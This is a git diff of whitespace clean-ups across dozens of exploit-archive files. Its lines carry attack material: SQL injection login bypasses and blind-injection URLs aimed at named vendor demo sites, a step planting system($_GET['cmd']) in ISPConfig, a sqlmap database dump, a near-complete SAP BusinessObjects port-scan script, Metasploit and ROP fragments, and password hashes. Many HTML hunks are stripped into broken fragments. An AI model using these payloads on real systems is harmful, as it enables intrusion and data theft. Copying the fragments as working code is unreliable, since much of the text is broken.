diff --git a/exploits/aix/dos/35342.txt b/exploits/aix/dos/35342.txt index 8e6af2054..b51b5bbcc 100644 --- a/exploits/aix/dos/35342.txt +++ b/exploits/aix/dos/35342.txt @@ -43,7 +43,7 @@ function updateDataBase($robot, $nom, $actif, $user_agent, $ip1, $ip2, $detectio global $RS_LANG, $RS_LANGUE, $RS_TABLE_ROBOTS, $RS_DETECTION_USER_AGENT, $RS_DETECTION_IP; // dans tous les cas : - echo "

 "; + echo "

"; $msg = ""; // test du nom diff --git a/exploits/aix/webapps/11580.txt b/exploits/aix/webapps/11580.txt index dadcbd759..406990f64 100644 --- a/exploits/aix/webapps/11580.txt +++ b/exploits/aix/webapps/11580.txt @@ -54,8 +54,8 @@ Add/Edit Admin CSRF: Upload Rename Delete Edit Download Chmod -Move   -  +Move + diff --git a/exploits/aix/webapps/14058.html b/exploits/aix/webapps/14058.html index 7359241c6..c76c2db93 100644 --- a/exploits/aix/webapps/14058.html +++ b/exploits/aix/webapps/14058.html @@ -69,12 +69,12 @@ http://Target.com/includes/FCKeditor/editor/filemanager/browser/default/connecto -    + Current Folder
-    + Resource Type
@@ -96,16 +96,16 @@ Resource Type
Get Folders -    + Get Folders and Files -    + Create Folder -    +

diff --git a/exploits/asp/webapps/11295.txt b/exploits/asp/webapps/11295.txt index f9a09fe33..366f21426 100644 --- a/exploits/asp/webapps/11295.txt +++ b/exploits/asp/webapps/11295.txt @@ -11,7 +11,7 @@ Arbitrary File Upload



- 

+

diff --git a/exploits/asp/webapps/12471.txt b/exploits/asp/webapps/12471.txt index 114a978c9..860494f7c 100644 --- a/exploits/asp/webapps/12471.txt +++ b/exploits/asp/webapps/12471.txt @@ -75,8 +75,8 @@ DEMO : TO change the admin login details and other info.. -   -   + + diff --git a/exploits/asp/webapps/13891.html b/exploits/asp/webapps/13891.html index a1dd8738c..c9102bcc4 100644 --- a/exploits/asp/webapps/13891.html +++ b/exploits/asp/webapps/13891.html @@ -22,8 +22,8 @@ Sex

Avatar :

-

 

-

 

+

+

diff --git a/exploits/asp/webapps/17015.txt b/exploits/asp/webapps/17015.txt index fee4b2542..d3e4030c4 100644 --- a/exploits/asp/webapps/17015.txt +++ b/exploits/asp/webapps/17015.txt @@ -7,7 +7,7 @@ # Software Link: http://www.element-it.com/downloadfile.aspx?type=pow # Demo: http://site.com/Examples/PowUpload/Simpleupload.htm -  + [Comment] Agradezco a mis amigos: Hernan Jais, Alfonso Cuevas, Inyexion, Login-Root, KikoArg, Ricota, diff --git a/exploits/asp/webapps/17016.txt b/exploits/asp/webapps/17016.txt index 4ab9d3d85..80f6110f4 100644 --- a/exploits/asp/webapps/17016.txt +++ b/exploits/asp/webapps/17016.txt @@ -6,7 +6,7 @@ # Software: EAFlashUpload v 2.5 # Software Link: http://www.easyalgo.com/downloads.aspx#EAFlashUpload # Demo: http://www.site.com/examples/eaflashupload/simpleupload.aspx -  + [Comment] Agradezco a mis amigos: Hernan Jais, Alfonso Cuevas, Inyexion, Login-Root, KikoArg, Ricota, diff --git a/exploits/asp/webapps/3493.txt b/exploits/asp/webapps/3493.txt index ec25e6274..fb361a8a1 100644 --- a/exploits/asp/webapps/3493.txt +++ b/exploits/asp/webapps/3493.txt @@ -194,16 +194,16 @@ MSSQL CMD Injection Exploit(For DBO Users) :

Command Exec : -   + Search Board -   +  

+

diff --git a/exploits/asp/webapps/7277.txt b/exploits/asp/webapps/7277.txt index 3ac299f7b..f12e83bbc 100644 --- a/exploits/asp/webapps/7277.txt +++ b/exploits/asp/webapps/7277.txt @@ -1,4 +1,4 @@ -[~] ----------------------------بسم الله الرحمن الرحيم------------------------------ +[~] ----------------------------بسم الله الرحمنالرحيم------------------------------  [~]Tybe:(Auth Bypass) Remote SQL Injection Vulnerability    [~]Vendor: www.activewebsoftwares.com @@ -30,7 +30,7 @@   [~] Greetz tO: {str0ke} & maxmos & EV!L KS@ & hesham_hacker  [~] - [~] spechial thanks : dolly & 7am3m & عماد ,الزهيري + [~] spechial thanks : dolly & 7am3m & عماد ,الزهيري [~]  [~] EV!L !NS!D3 734M --- R3d-D3v!L--EXOT!C --poison scorbion --samakiller  [~] diff --git a/exploits/asp/webapps/7423.txt b/exploits/asp/webapps/7423.txt index 702f7678c..47e709ab1 100644 --- a/exploits/asp/webapps/7423.txt +++ b/exploits/asp/webapps/7423.txt @@ -4,25 +4,25 @@ [~] Vendor: www.adserversolutions.com - [☠] Software: Affiliate Software Java 4.0 + [☠] Software: Affiliate Software Java 4.0 - [☠] author: ((я3d D3v!L)) + [☠] author: ((я3d D3v!L)) - [☠] Date: 12.12.2008 + [☠] Date: 12.12.2008 - [☠] Home: www.ahacker.biz + [☠] Home: www.ahacker.biz - [☠] contact: N/A + [☠] contact: N/A -[☠] ☠☠☠☠☠☠☠☠☠☠☠☠☠☠☠☠☠☠☠☠☠☠☠☠☠☠☠☠☠{DEV!L'5 of SYST3M}☠☠☠☠☠☠☠☠☠☠☠☠☠☠☠☠☠☠☠☠☠☠☠☠☠ +[☠] ☠☠☠☠☠☠☠☠☠☠☠☠☠☠☠☠☠☠☠☠☠☠☠☠☠☠☠☠☠{DEV!L'5 of SYST3M}☠☠☠☠☠☠☠☠☠☠☠☠☠☠☠☠☠☠☠☠☠☠☠☠☠- [☠] Exploit: + [☠] Exploit: - ☠ username: r0' or ' 1=1-- - ☠ password: r0' or ' 1=1-- + ☠username: r0' or ' 1=1-- + ☠password: r0' or ' 1=1-- - [☠]login 4 d3m0: + [☠]login 4 d3m0: http://www.adserversolutions.com/affiliate_java/logon.jsp diff --git a/exploits/asp/webapps/7424.txt b/exploits/asp/webapps/7424.txt index eda069309..514e31f3c 100644 --- a/exploits/asp/webapps/7424.txt +++ b/exploits/asp/webapps/7424.txt @@ -14,7 +14,7 @@ [~] contact: N/A -[~]☠☠☠☠☠☠☠☠☠☠☠☠☠☠☠☠☠☠☠☠☠☠☠☠☠☠☠☠☠{R0}☠☠☠☠☠☠☠☠☠☠☠☠☠☠☠☠☠☠☠☠☠☠☠☠☠ +[~]☠☠☠☠☠☠☠☠☠☠☠☠☠☠☠☠☠☠☠☠☠☠☠☠☠☠☠☠☠{R0}☠☠☠☠☠☠☠☠☠☠☠☠☠☠☠☠☠☠☠☠☠☠☠☠☠[~] Exploit: @@ -22,7 +22,7 @@ [~] password: r0' or ' 1=1-- - [☠] login 4 d3m0: + [☠] login 4 d3m0: www.adserversolutions.com/admgmt_460/logon.jsp diff --git a/exploits/asp/webapps/7425.txt b/exploits/asp/webapps/7425.txt index 83144dc72..3fbb985d8 100644 --- a/exploits/asp/webapps/7425.txt +++ b/exploits/asp/webapps/7425.txt @@ -14,7 +14,7 @@ [~] contact: N/A -[~]☠☠☠☠☠☠☠☠☠☠☠☠☠☠☠☠☠☠☠☠☠☠☠☠☠☠☠☠☠{R0}☠☠☠☠☠☠☠☠☠☠☠☠☠☠☠☠☠☠☠☠☠☠☠☠☠ +[~]☠☠☠☠☠☠☠☠☠☠☠☠☠☠☠☠☠☠☠☠☠☠☠☠☠☠☠☠☠{R0}☠☠☠☠☠☠☠☠☠☠☠☠☠☠☠☠☠☠☠☠☠☠☠☠☠[~] Exploit: @@ -22,7 +22,7 @@ [~] password: r0' or ' 1=1-- - [☠]login 4 d3m0: + [☠]login 4 d3m0: www.adservingsolutions.com/xchange_java/logon_license.jsp diff --git a/exploits/asp/webapps/9675.txt b/exploits/asp/webapps/9675.txt index fe3352018..947d4114b 100644 --- a/exploits/asp/webapps/9675.txt +++ b/exploits/asp/webapps/9675.txt @@ -1,42 +1,42 @@ [☢] ☢☢☢☢☢☢☢☢☢☢☢☢☢☢☢☢☢☢☢☢☢☢☢☢☢{بسم الله الرحمن الرحيم}☢☢☢☢☢☢☢☢☢☢☢☢☢☢☢☢☢☢☢☢☢☢ -[☠] +[☠] [~] Tybe:(details.asp PropId) BL!ND SQL Injection Vulnerability -[☠] +[☠] [~] Vendor: www.hotwebscripts.co.uk -[☠] -[☠] Software: HotWeb Rentals -[☠] -[☠] author: ((я3d D3v!L)) -[☠] -[☠] Date: 15.2.2009 -[☠] -[☠] Home: CL053D -[☠] -[☠] contact: X@hotmail.co.jp -[☠]☠☠☠☠☠☠☠☠☠☠☠☠☠☠☠☠☠☠☠☠☠☠{DEV!L'5 of SYST3M}☠☠☠☠☠☠☠☠☠☠☠☠☠☠☠☠☠☠ +[☠] +[☠] Software: HotWeb Rentals +[☠] +[☠] author: ((я3d D3v!L)) +[☠] +[☠] Date: 15.2.2009 +[☠] +[☠] Home: CL053D +[☠] +[☠] contact: X@hotmail.co.jp +[☠]☠☠☠☠☠☠☠☠☠☠☠☠☠☠☠☠☠☠☠☠☠☠{DEV!L'5 of SYST3M}☠☠☠☠☠☠☠☠☠☠☠☠☠☠☠☠☠☠-[☠] ERR0R CONSOLE +[☠] ERR0R CONSOLE WwW.XxX.CcC/details.asp?PropId=(BL!ND EV!L !NJ3c7!0N) -[☠]SECURE ALERT FR0M 7h3 R3d-D3V!L +[☠]SECURE ALERT FR0M 7h3 R3d-D3V!L -[☠] Exploit: +[☠] Exploit: -[☠] TRU3 : details.asp?PropId=1+and+1=1 +[☠] TRU3 : details.asp?PropId=1+and+1=1 - [☠] FALS3 : details.asp?PropId=1+and+1=2 + [☠] FALS3 : details.asp?PropId=1+and+1=2 -[☠]liv3 3xpL0!T: -[☠] TRU3 : holidayrentals.hotwebscripts.co.uk/details.asp?PropId=1+and+1=1 -[☠] F4L53 :holidayrentals.hotwebscripts.co.uk/details.asp?PropId=1+and+1=2 +[☠]liv3 3xpL0!T: +[☠] TRU3 : holidayrentals.hotwebscripts.co.uk/details.asp?PropId=1+and+1=1 +[☠] F4L53 :holidayrentals.hotwebscripts.co.uk/details.asp?PropId=1+and+1=2 - [☠] + [☠] N073: -R34L R3d-D3V!L WAS h3R3 ((☠X@Minhal.co.il☠)) +R34L R3d-D3V!L WAS h3R3 ((☠X@Minhal.co.il☠)) 4R48!4N-HACK3R!!القراصنه العرب @@ -46,9 +46,9 @@ R34L R3d-D3V!L WAS h3R3 ((☠X@Minhal.co.il☠)) [~]70 ِALL ARAB!AN HACKER 3X3PT:LAM3RZ [~] spechial thanks : ((dolly)) & ((7am3m)) &MAGOUSH ;) & EMAD & 0R45h3Y - [☠]spechial SupP0RT: MY M!ND -57R0K3-''M!Lw0RM 3MP3R0R''-''3XPLO!T-houSE'' + [☠]spechial SupP0RT: MY M!ND -57R0K3-''M!Lw0RM 3MP3R0R''-''3XPLO!T-houSE'' -[☠] EV!L !NS!D3 734M --- R3d-D3v!L--EXOT!C --poison scorbion --D3V!L R007 +[☠] EV!L !NS!D3 734M --- R3d-D3v!L--EXOT!C --poison scorbion --D3V!L R007 [~]spechial FR!ND: 74M3M تميم diff --git a/exploits/hardware/dos/11769.py b/exploits/hardware/dos/11769.py index 223eef81f..01b5548c7 100755 --- a/exploits/hardware/dos/11769.py +++ b/exploits/hardware/dos/11769.py @@ -36,7 +36,7 @@ def main():
-   +
diff --git a/exploits/hardware/local/24899.txt b/exploits/hardware/local/24899.txt index 1b23630ef..41627da10 100644 --- a/exploits/hardware/local/24899.txt +++ b/exploits/hardware/local/24899.txt @@ -14,7 +14,7 @@ The Vigor 3900 is a high-performance quad-Gigabit WAN router for high-performanc failover. Its WAN throughput runs at up to 1Gb/s, adequate for the most demanding SME applications. The WAN ports on the Vigor 3900 can provide load balancing or WAN failover. Based on a new DrayTek OS platform, the Vigor 3900 combines high performance and capacity with DrayTek's traditional ease of use and comprehensive features set. -########For multi-tenant or departmental flexibility, the Vigor3900 will support multiple LAN IP subnets, together with VLAN capabilities and user management +########For multi-tenant or departmental flexibility, the Vigor3900 will support multiple LAN IP subnets, together with VLAN capabilities and user management providing access to WAN resources only to the appropriate users or departments, as well as maintaining infrastructure effciency. ############################Advisory:################################################### diff --git a/exploits/hardware/webapps/26401.txt b/exploits/hardware/webapps/26401.txt index d3c824105..bad7bea3e 100644 --- a/exploits/hardware/webapps/26401.txt +++ b/exploits/hardware/webapps/26401.txt @@ -26,8 +26,8 @@ Exploit: Factory Reset - -
 Do you want to restore Print Server to factory default setting?

  + Do you want to restore Print Server to factory default setting? +
@@ -41,7 +41,7 @@ Exploit: - + YES (access to all features and categories)
NO (you can limit features and categories) - Support



  + Support



View tickets1
Edit ticket replies1
Delete any ticket notes1, 2
diff --git a/exploits/php/webapps/1140.php b/exploits/php/webapps/1140.php index 61180fe4b..d90baf04a 100644 --- a/exploits/php/webapps/1140.php +++ b/exploits/php/webapps/1140.php @@ -73,7 +73,7 @@ $datai=dechex(ord($headeri[$ii])); if ($ji==16) { $ji=0; $ci++; - echo ""; + echo ""; for ($li=0; $li<=15; $li++) { echo ""; } @@ -86,7 +86,7 @@ $ii++; $ji++; } for ($li=1; $li<=(16 - (strlen($headeri) % 16)+1); $li++) - { echo ""; + { echo ""; } for ($li=$ci*16; $li<=strlen($headeri); $li++) diff --git a/exploits/php/webapps/11593.txt b/exploits/php/webapps/11593.txt index aa4daa5ce..01537183a 100644 --- a/exploits/php/webapps/11593.txt +++ b/exploits/php/webapps/11593.txt @@ -11,11 +11,11 @@ # # if(empty($admin_name)) # { -# $errorMessage=warning." Username is empty!"; +# $errorMessage=warning." Username is empty!"; # } # elseif(empty($admin_password)) # { -# $errorMessage=warning." Password is empty!"; +# $errorMessage=warning." Password is empty!"; # } # # diff --git a/exploits/php/webapps/11883.txt b/exploits/php/webapps/11883.txt index f50cfabca..f13c461de 100644 --- a/exploits/php/webapps/11883.txt +++ b/exploits/php/webapps/11883.txt @@ -18,7 +18,7 @@ Contact Me : Eg[At]Hack[DoT]Cl WebSiteBaker 2.8.1 DataBase Backup -

 

+

WebSiteBaker 2.8.1 DataBase Backup

By : Tr0y-x

@@ -26,7 +26,7 @@ Contact Me : Eg[At]Hack[DoT]Cl WwW[DoT]SeC-WaR[DoT]CoM

Eg[At]Hack[Dot]Cl

-

 

+

@@ -39,9 +39,9 @@ Contact Me : Eg[At]Hack[DoT]Cl

-

 

+

Greetz : Alnjm33 - Predator - xXx - -Shooter  - Jamba - Jago-dz & All Sec-War.Com Members

+Shooter - Jamba - Jago-dz & All Sec-War.Com Members

Specially To My Best Friend XR57

:::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::: diff --git a/exploits/php/webapps/12031.html b/exploits/php/webapps/12031.html index d3a3eee59..44ff68e0a 100644 --- a/exploits/php/webapps/12031.html +++ b/exploits/php/webapps/12031.html @@ -34,7 +34,7 @@ My home : Sec-war.com +

@@ -50,7 +50,7 @@ My home : Sec-war.com @@ -59,13 +59,13 @@ My home : Sec-war.com

PASS must me*

@@ -76,12 +76,12 @@ My home : Sec-war.com + @@ -97,12 +97,12 @@ My home : Sec-war.com -   + @@ -119,12 +119,12 @@ My home : Sec-war.com -   +
 IP Address: IP Address: @@ -68,8 +68,8 @@ Exploit:
@@ -49,15 +49,15 @@ Exploit: - + - + - +
IP Address:  :
Subnet Mask:  :
Default Gateway:  :
- - + +
    
\ No newline at end of file diff --git a/exploits/hardware/webapps/32943.txt b/exploits/hardware/webapps/32943.txt index d5a365e5b..d700d0885 100644 --- a/exploits/hardware/webapps/32943.txt +++ b/exploits/hardware/webapps/32943.txt @@ -2,11 +2,11 @@ # Date: 20-04-2014 # Author: Rakesh S # Software Link: http://www.teracom.in/ -# Version:  T2-B-Gawv1.4U10Y-BI +# Version: T2-B-Gawv1.4U10Y-BI The vulnerability exists due to insufficient validation of HTTP request origin. A remote attacker can trick a logged-in administrator to visit a specially crafted webpage to change SSID and its password. -  + The exploitation example below changes password for the SSID: -  -  + + Submit \ No newline at end of file diff --git a/exploits/hardware/webapps/44935.txt b/exploits/hardware/webapps/44935.txt index e5de7efb8..9fc8b669f 100644 --- a/exploits/hardware/webapps/44935.txt +++ b/exploits/hardware/webapps/44935.txt @@ -1,6 +1,6 @@ # Exploit Title: DIGISOL DG-BR4000NG - Cross-Site Scripting # Date: 2018-06-24 -# Vendor Homepage:  http://www.digisol.com +# Vendor Homepage: http://www.digisol.com # Hardware Link: https://www.amazon.in/Digisol-DG-BR4000NG-Wireless-Broadband-802-11n/dp/B00A19EHYK # Category: Hardware # Exploit Author: Adipta Basu @@ -8,9 +8,9 @@ # Web: https://hackings8n.blogspot.com # Tested on: Mac OS High Sierra # CVE: CVE-2018-12705 -  + # Reproduction Steps: -  + - Goto your Wifi Router Gateway [i.e: http://192.168.2.1] - Go to --> "General Setup" --> "Wireless" --> "Basic Settings" - Open BurpSuite diff --git a/exploits/hardware/webapps/44955.txt b/exploits/hardware/webapps/44955.txt index 382183ac9..a993a3b0d 100644 --- a/exploits/hardware/webapps/44955.txt +++ b/exploits/hardware/webapps/44955.txt @@ -1,17 +1,17 @@ # Exploit Title: DIGISOL DG-HR3400 Wireless Router - Cross-Site Scripting # Date: 2018-06-25 -# Vendor Homepage:  http://www.digisol.com +# Vendor Homepage: http://www.digisol.com # Hardware Link: https://www.amazon.in/Digisol-DG-HR3400-300Mbps-Wireless-Broadband/dp/B00IL8DR6W # Category: Hardware # Exploit Author: Adipta Basu # Tested on: Mac OS High Sierra # CVE: N/A -  + # Reproduction Steps: -  -   - Goto your Wifi Router Gateway [i.e: http://192.168.2.1] -   - Go to --> "General Setup" --> "Wireless" --> "Basic Settings" -   - Open BurpSuite + + - Goto your Wifi Router Gateway [i.e: http://192.168.2.1] + - Go to --> "General Setup" --> "Wireless" --> "Basic Settings" + - Open BurpSuite - Change the SSID to "Testing" and hit "Apply" - Burp will capture the intercepts. - Now change the SSID to and keep APSSID as it is diff --git a/exploits/hardware/webapps/45037.txt b/exploits/hardware/webapps/45037.txt index 19a1942d4..ccadac58e 100644 --- a/exploits/hardware/webapps/45037.txt +++ b/exploits/hardware/webapps/45037.txt @@ -104,7 +104,7 @@ testlab:$1$.ezacuj4$s.hoiWAaLH7G./vHcfXku. testlab1:$1$tV44sdhe$cgoB4Pk814NQl.1Uo90It0 testlab1:$1$tV44sdhe$cgoB4Pk814NQl.1Uo90It0 roOt:$1$MJOnV/Y3$tDnMIBMy0lEQ2kDpfgTJP0" /> - + diff --git a/exploits/hardware/webapps/45038.txt b/exploits/hardware/webapps/45038.txt index f0c747bfe..85dafa743 100644 --- a/exploits/hardware/webapps/45038.txt +++ b/exploits/hardware/webapps/45038.txt @@ -155,7 +155,7 @@ START=90 ftpd & " /> - + diff --git a/exploits/ios/dos/37660.txt b/exploits/ios/dos/37660.txt index d9974989a..62480328b 100644 --- a/exploits/ios/dos/37660.txt +++ b/exploits/ios/dos/37660.txt @@ -21,7 +21,7 @@ use threads; use LWP::UserAgent; -print "    Mohammad Reza Espargham\n   www.reza.es\n\n Syntax: perl poc.pl 192.168.1.3\n\n"; +print " Mohammad Reza Espargham\n www.reza.es\n\n Syntax: perl poc.pl 192.168.1.3\n\n"; $port=8080; #port diff --git a/exploits/ios/webapps/27188.txt b/exploits/ios/webapps/27188.txt index 4863b0b70..3a2a71b7b 100644 --- a/exploits/ios/webapps/27188.txt +++ b/exploits/ios/webapps/27188.txt @@ -129,7 +129,7 @@ Add Directory | Select All | Delete Photos/ ><[PERSISTENT INJECTED SCRIPT CODE VIA ADD DIRECTORY NAME]">/ -    < diff --git a/exploits/java/webapps/43733.rb b/exploits/java/webapps/43733.rb index 875803ee2..2d3840839 100755 --- a/exploits/java/webapps/43733.rb +++ b/exploits/java/webapps/43733.rb @@ -13,7 +13,7 @@ class MetasploitModule < Msf::Exploit::Remote 'Name' => 'CVE-2017-1000486 Primefaces Remote Code Execution Exploit', 'Description' => %q{ This module exploits an expression language remote code execution flaw in the Primefaces JSF framework. - Primefaces versions prior to 5.2.21, 5.3.8 or 6.0 are vulnerable to a padding oracle attack, due to the use of weak crypto and default encryption password and salt. + Primefaces versions prior to 5.2.21, 5.3.8 or 6.0 are vulnerable to a padding oracle attack, due to the use of weak crypto and default encryption password and salt. }, 'Author' => [ 'Bjoern Schuette' ], 'License' => MSF_LICENSE, diff --git a/exploits/jsp/remote/18179.html b/exploits/jsp/remote/18179.html index 2d0760aea..2191df72b 100644 --- a/exploits/jsp/remote/18179.html +++ b/exploits/jsp/remote/18179.html @@ -2,9 +2,9 @@ # Date:30/11/2011 # Author: Alexey Sintsov # Software Link: http://www.ibm.com/ -# Version:8.5.3/8.5.2 FP3 (0day)  +# Version:8.5.3/8.5.2 FP3 (0day) # Tested on: Windows 7 / Windows 2008 -# CVE : CVE-2011-1519 +# CVE : CVE-2011-1519 Application: IBM Lotus Domino Controller @@ -12,7 +12,7 @@ Versions Affected: <=8.5.2 FP3, <=8.5.3 Manager 4.0 prior to Update 4 (0day) Vendor URL: http://ibm.com -Bug: own XML parser   +Bug: own XML parser CVE: CVE-2011-1519 CVSS2: 9.0 Exploits: YES @@ -23,7 +23,7 @@ Digital Security Research Group [DSecRG] (research [at] dsecrg [dot]com) This bug was found by Patrik Karlsson and sold to ZDI. IBM make fix for this bug, but not enough. So this sploit can make auth. bypass in Lotus Domino Controller even with patch from IBM. So still 0day. -Details you can read there: http://dsecrg.com/pages/pub/show.php?id=41 +Details you can read there: http://dsecrg.com/pages/pub/show.php?id=41 EXPLOIT: @@ -65,9 +65,4 @@ height = "99%" - - - - - -  \ No newline at end of file + \ No newline at end of file diff --git a/exploits/jsp/webapps/21545.txt b/exploits/jsp/webapps/21545.txt index a4aaf590f..3d221894f 100644 --- a/exploits/jsp/webapps/21545.txt +++ b/exploits/jsp/webapps/21545.txt @@ -4,7 +4,7 @@ CVE-2012-4051 - JAMF Casper Suite MDM CSRF Vulnerability # Date: Discovered and reported July 2012 # Author: Jacob Holcomb/Gimppy042 # Software JAMF Software Casper Suite (http://jamfsoftware.com/products/casper-suite) -# CVE : CVE-2012-4051 for the CSRF  +# CVE : CVE-2012-4051 for the CSRF diff --git a/exploits/linux/local/19517.pl b/exploits/linux/local/19517.pl index 287e2df75..8a717a3df 100755 --- a/exploits/linux/local/19517.pl +++ b/exploits/linux/local/19517.pl @@ -14,9 +14,9 @@ highlighted remember password. Greetz: Hernan Jais, Alfonso Cuevas, SPEED, hacklego, Incid3nt, Maximiliano Soler, Pablin77,_tty0, Login-Root,Knet,Kikito,Duraznit0, InyeXion, ksha, zerial,LinuxFer, Scorp -    her0, r0dr1 y demas user de RemoteExecution -    www.remoteexecution.info www.remoteexcution.com.ar -    #RemoteExecution Hacking Group + her0, r0dr1 y demas user de RemoteExecution + www.remoteexecution.info www.remoteexcution.com.ar + #RemoteExecution Hacking Group [PoC] diff --git a/exploits/linux/remote/18145.py b/exploits/linux/remote/18145.py index 9a51f1ea8..4a401899d 100755 --- a/exploits/linux/remote/18145.py +++ b/exploits/linux/remote/18145.py @@ -132,8 +132,8 @@ addr_os = { # ID # OS # STACK SIZE # GADGET TABLE 1 : ["Arch Linux 2010.05 ", 0xb9, arch_rop_chain], # wireshark-gtk-1.4.3-1-i686.pkg.tar.xz 2 : ["Labs test ", 0xbf, labs_rop_chain], - -1 : ["Debian 5.0.8 Lenny ", -3, False], # wireshark_1.0.2-3+lenny12_i386.deb - -2 : ["Debian 6.0.2 Squeeze ", -1, False], # wireshark_1.2.11-6+squeeze1_i386.deb + -1 : ["Debian 5.0.8 Lenny ", -3, False], # wireshark_1.0.2-3+lenny12_i386.deb + -2 : ["Debian 6.0.2 Squeeze ", -1, False], # wireshark_1.2.11-6+squeeze1_i386.deb -3 : ["Fedora 14 ", -1, False], # wireshark-1.4.3-1.2.2.i586.rpm -4 : ["OpenSuse 11.3 ", -1, False], # wireshark-1.4.3-1.2.2.i586.rpm -5 : ["Ubuntu 10.10 | 11.04 ", -1, False], # diff --git a/exploits/linux/remote/364.pl b/exploits/linux/remote/364.pl index c37f1293c..b49f11f46 100755 --- a/exploits/linux/remote/364.pl +++ b/exploits/linux/remote/364.pl @@ -38,7 +38,7 @@ print "Sent\n"; while (<$remote>) { - print $_; + print $_; } print "\n"; diff --git a/exploits/linux/webapps/34241.txt b/exploits/linux/webapps/34241.txt index 9af2d3952..fb042d09c 100644 --- a/exploits/linux/webapps/34241.txt +++ b/exploits/linux/webapps/34241.txt @@ -16,7 +16,7 @@ While logged in as admin user: 3) log in as that user -4) edit /usr/local/ispconfig/interface/lib/lang/en.lng with system($_GET['cmd']); +4) edit /usr/local/ispconfig/interface/lib/lang/en.lng with system($_GET['cmd']); 5) browse to: http://server:8080/index.php?cmd=echo /tmp/script >>/usr/local/ispconfig/server/server.sh diff --git a/exploits/linux/webapps/49321.py b/exploits/linux/webapps/49321.py index b62e60274..109253b02 100755 --- a/exploits/linux/webapps/49321.py +++ b/exploits/linux/webapps/49321.py @@ -2,7 +2,7 @@ # Date: 12/12/2020 # Exploit Author: IHTeam # Full Write-up: https://www.ihteam.net/advisory/terramaster-tos-multiple-vulnerabilities/ -# Vendor Homepage: https://www.terra-master.com/ +# Vendor Homepage: https://www.terra-master.com/ # Version: <= 4.2.06 # Tested on: 4.1.30, 4.2.06 diff --git a/exploits/multiple/dos/10870.html b/exploits/multiple/dos/10870.html index ac1063bf2..72e42ab99 100644 --- a/exploits/multiple/dos/10870.html +++ b/exploits/multiple/dos/10870.html @@ -30,9 +30,9 @@ Click on google (look the Status bar) and you'll be redirect on Yahoo


-                           Look Here
-                   | 
-                  V + Look Here
+ |
+ V -4. Script saved and gives an image msg with a javascript execution on image click. -5. Therefore, Persistent XSS. \ No newline at end of file + +1. Access and go to the Radio URL tab and add a new URL. +2. Add script as the value of the field. +3. Payload : +4. Script saved and gives an image msg with a javascript execution on image click. +5. Therefore, Persistent XSS. \ No newline at end of file diff --git a/exploits/multiple/webapps/43404.py b/exploits/multiple/webapps/43404.py index 234dba7d7..e2c32f382 100755 --- a/exploits/multiple/webapps/43404.py +++ b/exploits/multiple/webapps/43404.py @@ -19,8 +19,8 @@ import sys if len(sys.argv) != 4: -   print "Usage: python sblpta.py http://path.faces targetIP targetPort" -   sys.exit(1) + print "Usage: python sblpta.py http://path.faces targetIP targetPort" + sys.exit(1) url = sys.argv[1] targetIP = sys.argv[2] @@ -33,15 +33,15 @@ gcontext = ssl.SSLContext(ssl.PROTOCOL_TLSv1) try: -   request = urllib2.Request(url, headers=headers) -   page = urllib2.urlopen(request, context=gcontext) -   print "[*] Connected to SAP Bussiness Object %s"  %url + request = urllib2.Request(url, headers=headers) + page = urllib2.urlopen(request, context=gcontext) + print "[*] Connected to SAP Bussiness Object %s" %url except: -   print "[-] Failed To connect to SAP Bussiness Object %s" %url -   print "[*] SAP Bussiness Object Link example: http://domain:port/BZ/portal/95000047/InfoView/logon.faces" -   sys.exit(2) + print "[-] Failed To connect to SAP Bussiness Object %s" %url + print "[*] SAP Bussiness Object Link example: http://domain:port/BZ/portal/95000047/InfoView/logon.faces" + sys.exit(2) resheaders = page.info() @@ -50,50 +50,50 @@ content = page.readlines() for line in content: -   if "com.sun.faces.VIEW" in line: -      sfview = line.split("=")[4].split("\"")[1] -      print "[*] Got java faces dynamic value" + if "com.sun.faces.VIEW" in line: + sfview = line.split("=")[4].split("\"")[1] + print "[*] Got java faces dynamic value" -   else: -      continue + else: + continue if not sfview: -   print "[-] Failed to java faces dynamic value, are you sure you extracted the java faces form from the link ??" -   sys.exit(3) + print "[-] Failed to java faces dynamic value, are you sure you extracted the java faces form from the link ??" + sys.exit(3) formdata = {"_id0:logon:CMS":targetHostIP, -         "_id0:logon:USERNAME":"", -         "_id0:logon:PASSWORD":"", -         "com.sun.faces.VIEW":sfview, -         "_id0":"_id0" -         } + "_id0:logon:USERNAME":"", + "_id0:logon:PASSWORD":"", + "com.sun.faces.VIEW":sfview, + "_id0":"_id0" + } data_encode = urllib.urlencode(formdata) -start =  datetime.now() -print "[*] Testing Timing Attack %s" %start        +start = datetime.now() +print "[*] Testing Timing Attack %s" %start request = urllib2.Request(url,data_encode) request.add_header('Cookie', cookie) -response  = urllib2.urlopen(request) +response = urllib2.urlopen(request) end = datetime.now() the_page = response.read() if "FWM" in the_page: -   elapsedTime = end-start -   if elapsedTime.total_seconds() >= 10: + elapsedTime = end-start + if elapsedTime.total_seconds() >= 10: -      print "[*] Port %s is Open, Gotcha !!! " %targetPort + print "[*] Port %s is Open, Gotcha !!! " %targetPort -   else: + else: -      print "[*] Port %s is Closed , we die fast"  %targetPort + print "[*] Port %s is Closed , we die fast" %targetPort elif "FWC" in the_page: -   print "[-] error login expired" -   sys.exit(10) \ No newline at end of file + print "[-] error login expired" + sys.exit(10) \ No newline at end of file diff --git a/exploits/multiple/webapps/49372.txt b/exploits/multiple/webapps/49372.txt index c474e2f4a..6d5fcb37c 100644 --- a/exploits/multiple/webapps/49372.txt +++ b/exploits/multiple/webapps/49372.txt @@ -7,8 +7,8 @@ # Tested on: BackBox Linux # CVE : CVE-2021-3018 -Check the CMS version :goto www.site.com/cms/ and you will notice that in the login box there is the CMS name and its version  -Check if it's vulnerable, goto ->: site.com/cms/print.php if the print.php exists, then try to find any valid ID which returns page to print  e.g: site.com/cms/print.php?id=1 +Check the CMS version :goto www.site.com/cms/ and you will notice that in the login box there is the CMS name and its version +Check if it's vulnerable, goto ->: site.com/cms/print.php if the print.php exists, then try to find any valid ID which returns page to print e.g: site.com/cms/print.php?id=1 Parameter: id (GET based) Use SQLmap if you've found the valid id... e.g: sqlmap -u "site.com/cms/print.php?id=1" --dbs diff --git a/exploits/php/webapps/11127.txt b/exploits/php/webapps/11127.txt index dd76f5190..c3403bd78 100644 --- a/exploits/php/webapps/11127.txt +++ b/exploits/php/webapps/11127.txt @@ -18,7 +18,7 @@
   ".$headeri[$li+$ki]."  
-

 

-

 

+

-   +

-

 

+

-   +

-  
-

 

+

-   +
